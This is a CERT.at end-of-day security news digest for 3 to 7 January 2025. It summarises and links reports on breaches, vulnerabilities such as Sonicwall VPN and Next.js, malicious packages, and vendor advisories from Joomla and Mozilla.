Tageszusammenfassung - 07.01.2025

End-of-Day report

Timeframe: Freitag 03-01-2025 18:00 - Dienstag 07-01-2025 18:00 Handler: Alexander Riepl Co-Handler: n/a

News

Windows 10 users urged to upgrade to avoid "security fiasco"

-Cybersecurity firm ESET is urging Windows 10 users to upgrade to Windows 11 or Linux to avoid a "security fiasco" as the 10-year-old operating system nears the end of support in October 2025.

https://www.bleepingcomputer.com/news/microsoft/windows-10-users-urged-to-upgrade-to-avoid-security-fiasco/

Cryptocurrency wallet drainers stole $494 million in 2024

Scammers stole $494 million worth of cryptocurrency in wallet drainer attacks last year that targeted more than 300,000 wallet addresses.

https://www.bleepingcomputer.com/news/security/cryptocurrency-wallet-drainers-stole-494-million-in-2024/

Chinese hackers also breached Charter and Windstream networks

-More U.S. companies have been added to the list of telecommunications firms hacked in a wave of breaches by a Chinese state-backed threat group tracked as Salt Typhoon.

https://www.bleepingcomputer.com/news/security/charter-and-windstream-among-nine-us-telecoms-hacked-by-china/

Trotz starker Kritik: Umstrittene UN-Cybercrime-Konvention verabschiedet

Netzaktivisten haben vergeblich vor der Verabschiedung der Konvention gewarnt. Es droht der Zugriff auf digitale Beweismittel durch autoritäre Staaten.

https://www.golem.de/news/trotz-starker-kritik-umstrittene-un-cybercrime-konvention-verabschiedet-2501-192183.html

After Chinas Salt Typhoon, the reconstruction starts now

If 40 years of faulty building gets blown down, don-t rebuild with the rubble Opinion When a typhoon devastates a land, it takes a while to understand the scale of the destruction. Disaster relief kicks in, communications rebuilt, and news flows out. Salt Typhoon is ..

https://www.theregister.com/2025/01/06/opinion_column_cybersec/

MediaTek rings in the new year with a parade of chipset vulns

Manufacturers should have had ample time to apply the fixes MediaTek kicked off the first full working week of the new year by disclosing a bevy of security vulnerabilities, including a critical remote code execution bug affecting 51 chipsets.

https://www.theregister.com/2025/01/06/mediatek_chipset_vulnerabilities/

Patchday: Wichtige Sicherheitsupdates schützen Android-Geräte

Google und weitere Hersteller von Android-Geräte haben mehrere kritische Lücken in verschiedenen Android-Versionen geschlossen.

https://www.heise.de/news/Patchday-Schadcode-Luecken-bedrohen-Android-12-13-14-und-15-10229347.html

Schwerwiegende Sicherheitslücken in Sonicwall SSL-VPN - aktiv ausgenutzt

Der Hersteller Sonicwall hat seine Kunden darüber informiert, dass einige Geräte von Sicherheitslücken betroffen sind. Besonders hervorzuheben ist dabei eine bereits angegriffenen Lücke bei denen Angreifer:innen die Authentifizierung ..

https://www.cert.at/de/warnungen/2025/1/schwewiegende-sicherheitslucken-in-sonicwall-ssl-vpn-aktiv-ausgenutzt

UN aviation agency actively investigating cybercriminal-s claimed data breach

The International Civil Aviation Organization (ICAO) said it was responding to claims of a data breach -allegedly linked to a threat actor known for targeting international organizations.-

https://therecord.media/united-nations-icao-investigating-data-breach

Critical Next.js Authorization Bypass Vulnerability

This specifically affects pages directly under the application-s root directory. Example:[Not affected] hxxps[://]example[.]com[Affected] hxxps[://]example[.]com/foo[Not affected] hxxps[://]example[.]com/foo/bar Successful exploitation of this vulnerability, allows a remote unauthenticated ..

https://www.truesec.com/hub/blog/critical-next-js-authorization-bypass-vulnerability

Achtung: Angeblich geleakter GTA San Andreas Source-Code mit Schadsoftware

Aktuell wird angeblich der Quellcode des Rockstar Games Spiels GTA San Andreas im Internet zum Download angeboten. Erste Hinweise scheinen seit gestern im Internet aufgetaucht zu sein (siehe z.B. den Artikel Rockstar reportedly faces another ..

https://www.borncity.com/blog/2025/01/06/achtung-angeblich-geleakter-gta-san-andreas-source-code-mit-schadsoftware/

New PhishWP Plugin on Russian Forum Turns Sites into Phishing Pages

SlashNext has discovered a malicious WordPress plugin, PhishWP, which creates convincing fake payment pages to steal your credit card information, 3DS codes, and personal data.

https://hackread.com/phishwp-plugin-russian-hacker-forum-phishing-sites/

U.S. Sanctions Chinese Cybersecurity Firm Over Cyberattacks

US sanctions Beijing-based Integrity Technology Group for aiding -Flax Typhoon- hackers in cyberattacks on American infrastructure, freezing assets-

https://hackread.com/us-sanctions-chinese-cybersecurity-firm-cyberattacks/

CVE-2024-4577: Windows Encoding Gone Wrong

CVE-2024-4577 is a critical vulnerability in Windows-based PHP installations, affecting CGI configurations, that allow remote code execution.

https://www.bitsight.com/blog/cve-2024-4577-windows-encoding-gone-wrong

Weaponizing OAST: How Malicious Packages Exploit npm, PyPI, and RubyGems for Data Exfiltration and Recon

Socket researchers uncover how threat actors weaponize Out-of-Band Application Security Testing (OAST) techniques across the npm, PyPI, and RubyGems ecosystems to exfiltrate sensitive data and remotely probe developer environments.Over the last year, Socket-s threat research team has continually observed and identified malicious JavaScript, Python, and Ruby packages ..

https://socket.dev/blog/weaponizing-oast-how-malicious-packages-exploit-npm-pypi-and-rubygems

Vulnerabilities

[20250103] - Core - Read ACL violation in multiple core views

Project: Joomla! SubProject: CMS Impact: Low Severity: Moderate Probability: Low Versions: 3.9.0-3.10.19-elts, 4.0.0-4.4.9, 5.0.0-5.2.2 Exploit type: ACL Violation Reported Date: 2024-08-26 Fixed Date: 2025-01-07 CVE Number: CVE-2024-40749 Description Improper Access Controls allows access to protected views. Affected Installs Joomla! CMS versions 3.9.0-3.10.19-elts, 4.0.0-4.4.9, 5.0.0-5.2.2 Solution Upgrade to version 3.10.20-elts, 4.4.10 or 5.2.3 Contact The JSST at the Joomla! Security

https://developer.joomla.org:443/security-centre/956-20250103-core-read-acl-violation-in-multiple-core-views.html

[20250102] - Core - XSS vector in the id attribute of menu lists

Project: Joomla! SubProject: CMS Impact: Low Severity: Moderate Probability: Low Versions: 3.0.0-3.10.19-elts, 4.0.0-4.4.9, 5.0.0-5.2.2 Exploit type: XSS Reported Date: 2024-09-19 Fixed Date: 2025-01-07 CVE Number: CVE-2024-40748 Description Lack of output escaping in the id attribute of menu lists. Affected Installs Joomla! CMS versions 3.0.0-3.10.19-elts, 4.0.0-4.4.9, 5.0.0-5.2.2 Solution Upgrade to version 3.10.20-elts, 4.4.10 or 5.2.3 Contact The JSST at the Joomla! Security Centre.

https://developer.joomla.org:443/security-centre/955-20250102-core-xss-vector-in-the-id-attribute-of-menu-lists.html

[20250101] - Core - XSS vectors in module chromes

Project: Joomla! SubProject: CMS Impact: Low Severity: Moderate Probability: Low Versions: 4.0.0-4.4.9, 5.0.0-5.2.2 Exploit type: XSS Reported Date: 2024-08-29 Fixed Date: 2025-01-07 CVE Number: CVE-2024-40747 Description Various module chromes didnt properly process inputs, leading to XSS vectors. Affected Installs Joomla! CMS versions 4.0.0-4.4.9, 5.0.0-5.2.2 Solution Upgrade to version 4.4.10 or 5.2.3 Contact The JSST at the Joomla! Security Centre. Reported By: Catalin Iovita

https://developer.joomla.org:443/security-centre/954-20250101-core-xss-vectors-in-module-chromes.html

Security Vulnerabilities fixed in Firefox ESR 115.19

https://www.mozilla.org/en-US/security/advisories/mfsa2025-03/

Security Vulnerabilities fixed in Firefox ESR 128.6

https://www.mozilla.org/en-US/security/advisories/mfsa2025-02/

Security Vulnerabilities fixed in Firefox 134

https://www.mozilla.org/en-US/security/advisories/mfsa2025-01/

Upcoming CVE for End-of-Life Node.js Versions

https://nodejs.org/en/blog/vulnerability/upcoming-cve-for-eol-versions